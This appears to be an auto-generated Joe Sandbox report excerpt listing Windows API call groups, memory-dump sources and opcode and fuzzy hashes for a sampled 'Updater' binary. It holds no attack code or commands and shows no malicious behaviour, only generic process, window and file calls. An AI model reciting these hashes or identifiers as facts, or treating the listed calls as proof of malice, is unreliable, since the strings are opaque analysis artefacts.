                                                                                                                                                    • Instruction Fuzzy Hash: 2F0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B8F9B0
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B8F9C6
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00B8F9D5
                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8F9E4
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8F9EE
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8F9F5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                    • Opcode ID: cc9ebf6f507cbe94fd3ed76ae805da3b14e5af14b4fa55fcee38e4d4857d2a1a
                                                                                                                                                    • Instruction ID: 48640e0503232151b4a9c887bf58df4b2e9f2e6b8e5dd45be89a8f981ada447a
                                                                                                                                                    • Opcode Fuzzy Hash: cc9ebf6f507cbe94fd3ed76ae805da3b14e5af14b4fa55fcee38e4d4857d2a1a
                                                                                                                                                    • Instruction Fuzzy Hash: EAF012311411597BE7215B569C0DEEB7B7CEB8AB11F000259F50592050AAE55A0186B5
                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32(?), ref: 00B789FB
                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B78A12
                                                                                                                                                    • GetWindowDC.USER32(?), ref: 00B78A1E
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00B78A2D
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00B78A3F
                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 00B78A59
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 272304278-0
                                                                                                                                                    • Opcode ID: 5681561852d4647fcfcd54cfe1fb2fbd3af46564e848fdb2a1dd3da75b923ed4
                                                                                                                                                    • Instruction ID: 8992c36f3949c84f943cb42afdac3bc3c8fda50ed3a182f4ef15faead08c6cf3
                                                                                                                                                    • Opcode Fuzzy Hash: 5681561852d4647fcfcd54cfe1fb2fbd3af46564e848fdb2a1dd3da75b923ed4
                                                                                                                                                    • Instruction Fuzzy Hash: 26015A31540205EFDB209B64DC48BB97BF5FB04320F1502A1FA2AA70A1DF751E91EF11
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B82999
                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00B829A5
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B829AE
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B829B6
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00B829BF
                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B829C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                    • Opcode ID: 6336789a8f0e1449497408596d57ef6913bc4554c8e606c656fd840d0e96e82d
                                                                                                                                                    • Instruction ID: b09d5b071facb5e33ed836b3225ba530a0fd67d1a46ca1970ef63795b688b9f8
                                                                                                                                                    • Opcode Fuzzy Hash: 6336789a8f0e1449497408596d57ef6913bc4554c8e606c656fd840d0e96e82d
                                                                                                                                                    • Instruction Fuzzy Hash: BBE0E5B6008106BBDB011FA6EC0C94ABF79FF49322B104320F22593070EFB69420DB50
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B32306: _wcslen.LIBCMT ref: 00B3230B
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B8D48A
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8D4D1
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B8D538
                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B8D566
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                                                                    • Opcode ID: c14af434f1724df2046c09b2d516efc42b4f86ac5efcc04bd82f92f2a3e62c68
                                                                                                                                                    • Instruction ID: 0241f2e276a804d6a0fea45037f32eeae0e7e9658411a1c3f7c1fabb871177f2
                                                                                                                                                    • Opcode Fuzzy Hash: c14af434f1724df2046c09b2d516efc42b4f86ac5efcc04bd82f92f2a3e62c68
                                                                                                                                                    • Instruction Fuzzy Hash: 0451CF716043019BD714BF28D885BAA77E8EB55328F040AABF995D32F0DBB0D904CB52
                                                                                                                                                    APIs
                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00BAB8AF
                                                                                                                                                      • Part of subcall function 00B32306: _wcslen.LIBCMT ref: 00B3230B
                                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00BAB944
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BAB973
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                    • String ID: <$@
                                                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                                                    • Opcode ID: 5f7654b4a6a14dcd46ee52642e684ee523e9a957c95ac05563ea4bcf204275f3
                                                                                                                                                    • Instruction ID: da65f753767016487a2c04917534d4af6df87e55a9562567cfb69fc039428928
                                                                                                                                                    • Opcode Fuzzy Hash: 5f7654b4a6a14dcd46ee52642e684ee523e9a957c95ac05563ea4bcf204275f3
                                                                                                                                                    • Instruction Fuzzy Hash: 9A717C74A00219DFCB14DF54D484A9EBBF4FF09710F0484A9E969AB352DB79EE40CBA4
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB47EA
                                                                                                                                                    • IsMenu.USER32(?), ref: 00BB47FF
                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB4847
                                                                                                                                                    • DrawMenuBar.USER32 ref: 00BB485A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                                                    • Opcode ID: c2260f956b32a74de1cdcca0013e2da61b32fd776d464dbac70f37cc144d1f0a
                                                                                                                                                    • Instruction ID: 9e0f13d7707b679968ce9357f040ee0c143dfd798c48af772b66f86630cce70e
                                                                                                                                                    • Opcode Fuzzy Hash: c2260f956b32a74de1cdcca0013e2da61b32fd776d464dbac70f37cc144d1f0a
                                                                                                                                                    • Instruction Fuzzy Hash: CC416874A00289EFDF20CF55D884AEABBF8FF44714F0481A9E90897251D7B0ED40CB90
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                      • Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59
                                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B82F15
                                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B82F28
                                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B82F58
                                                                                                                                                      • Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                                                                    • Opcode ID: 75214420b33edf0f754156669f012d2780e58e704e2cd9cf0d376fbb08903b1f
                                                                                                                                                    • Instruction ID: 29912b7e17394f1a36b211f0684e5a53a4b653e00513abbba076eeefd0c1699f
                                                                                                                                                    • Opcode Fuzzy Hash: 75214420b33edf0f754156669f012d2780e58e704e2cd9cf0d376fbb08903b1f
                                                                                                                                                    • Instruction Fuzzy Hash: 79210475900105AFDB14BB6498858FEB7F9DB45360B1082AAB916971E0EB384C09D720
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B345AE
                                                                                                                                                      • Part of subcall function 00B34570: GetStockObject.GDI32(00000011), ref: 00B345C2
                                                                                                                                                      • Part of subcall function 00B34570: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B345CC
                                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BB390F
                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00BB3916
                                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BB392B
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00BB3933
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                                                    • Opcode ID: b7a6fc46bdea6ab68d3cbdee43a7b8874d4fcbd8908b2cab6dc28da61dc68c28
                                                                                                                                                    • Instruction ID: d6cbf4f5b726ace4bd2dfe3285a6d73c683ee8d98146f8b868d91f5ebd23c5da
                                                                                                                                                    • Opcode Fuzzy Hash: b7a6fc46bdea6ab68d3cbdee43a7b8874d4fcbd8908b2cab6dc28da61dc68c28
                                                                                                                                                    • Instruction Fuzzy Hash: E4218871600206ABEF204E65DC80EFB77E9EF59B64F204668F992A31A0DBF1CD419760
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F
                                                                                                                                                      • Part of subcall function 00B83E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B83EB2
                                                                                                                                                      • Part of subcall function 00B83E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B83EC3
                                                                                                                                                      • Part of subcall function 00B83E94: GetCurrentThreadId.KERNEL32 ref: 00B83ECA
                                                                                                                                                      • Part of subcall function 00B83E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,00B8368B), ref: 00B83ED1
                                                                                                                                                    • GetFocus.USER32 ref: 00B8404B
                                                                                                                                                    • GetParent.USER32(00000000), ref: 00B84068
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00B840A7
                                                                                                                                                    • EnumChildWindows.USER32(?,00B84110), ref: 00B840CF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                    • String ID: %s%d
                                                                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                                                                    • Opcode ID: 166983fdb7766f119ee4e8338b6c766cad4534d290e894cc5f434b2092a77085
                                                                                                                                                    • Instruction ID: 71ce0e47b521db260165beabc6a8cf9edf0fd3d7652493f5b216623a051b4d3f
                                                                                                                                                    • Opcode Fuzzy Hash: 166983fdb7766f119ee4e8338b6c766cad4534d290e894cc5f434b2092a77085
                                                                                                                                                    • Instruction Fuzzy Hash: 6E21A175600206ABCF10BF60DC85AFA77E9AF94710F0440F6FE0A9B162DB755905CBB0
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B44C2A,00000003,?,00B44BCA,00000003,00BE9500,0000000C,00B44D21,00000003,00000002), ref: 00B44C99
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B44CAC
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00B44C2A,00000003,?,00B44BCA,00000003,00BE9500,0000000C,00B44D21,00000003,00000002,00000000), ref: 00B44CCF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                    • Opcode ID: 544f06b13d3e142fa31025c90178f3390a0fdd21263f409a329634264fa2e5d2
                                                                                                                                                    • Instruction ID: 1c602f974793e534f939306476e844d9a82ae6c37259e5e0ef75d08645bb1eae
                                                                                                                                                    • Opcode Fuzzy Hash: 544f06b13d3e142fa31025c90178f3390a0fdd21263f409a329634264fa2e5d2
                                                                                                                                                    • Instruction Fuzzy Hash: 55F04F70A01218BBDB159F94DD4DB9EBBF8EF04751F0401A9F806B32A1EF759E50DA90
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B327DC,?,?,00B3058E,?,00000001), ref: 00B3291B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B3292D
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00B327DC,?,?,00B3058E,?,00000001), ref: 00B3293F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 145871493-3689287502
                                                                                                                                                    • Opcode ID: b646f08a802f416f44e70d7220f22fdbf5e268102db6db606c646325451b4ce7
                                                                                                                                                    • Instruction ID: 9f51fa2c48594cf6d051cdf6d677f156d9fc24a60e6a316c479fd9d11b844b8c
                                                                                                                                                    • Opcode Fuzzy Hash: b646f08a802f416f44e70d7220f22fdbf5e268102db6db606c646325451b4ce7
                                                                                                                                                    • Instruction Fuzzy Hash: 0EE0CD356016222B8351171AAC0C76E76D8DFD2F22F1502B5F904F3120FFDCCC0280A1
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B777B4,?,?,00B3058E,?,00000001), ref: 00B328E1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B328F3
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00B777B4,?,?,00B3058E,?,00000001), ref: 00B32906
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 145871493-1355242751
                                                                                                                                                    • Opcode ID: e4c511894dec09d78496a3d12c8e01fe5849051c39660ba62fde001f3269b010
                                                                                                                                                    • Instruction ID: c4ab1cfd3c88dc851ed4ed717c285b9b5ede00bac3d2fde3c372e4d20d2d5fd5
                                                                                                                                                    • Opcode Fuzzy Hash: e4c511894dec09d78496a3d12c8e01fe5849051c39660ba62fde001f3269b010
                                                                                                                                                    • Instruction Fuzzy Hash: 19D0123560262A5786262729AC0CB9B7A95DF81F1171542B5F804B3124DFB9CD12C590
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B9396B
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00B939ED
                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B93A03
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B93A14
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B93A26
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Delete$Copy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3226157194-0
                                                                                                                                                    • Opcode ID: 5c419671942451ea1bdbf694617220cffb799fac735d8b03d8ddadc73ee79144
                                                                                                                                                    • Instruction ID: 6de3edd46ee3b46905dd84acc8f0122d57ce69d340712029dacf4c758b1a59d3
                                                                                                                                                    • Opcode Fuzzy Hash: 5c419671942451ea1bdbf694617220cffb799fac735d8b03d8ddadc73ee79144
                                                                                                                                                    • Instruction Fuzzy Hash: BCB13B71A00119ABDF15EBA4CC85EDEBBFDEF48710F1041F6F609A6151EA349B448B61
                                                                                                                                                    APIs
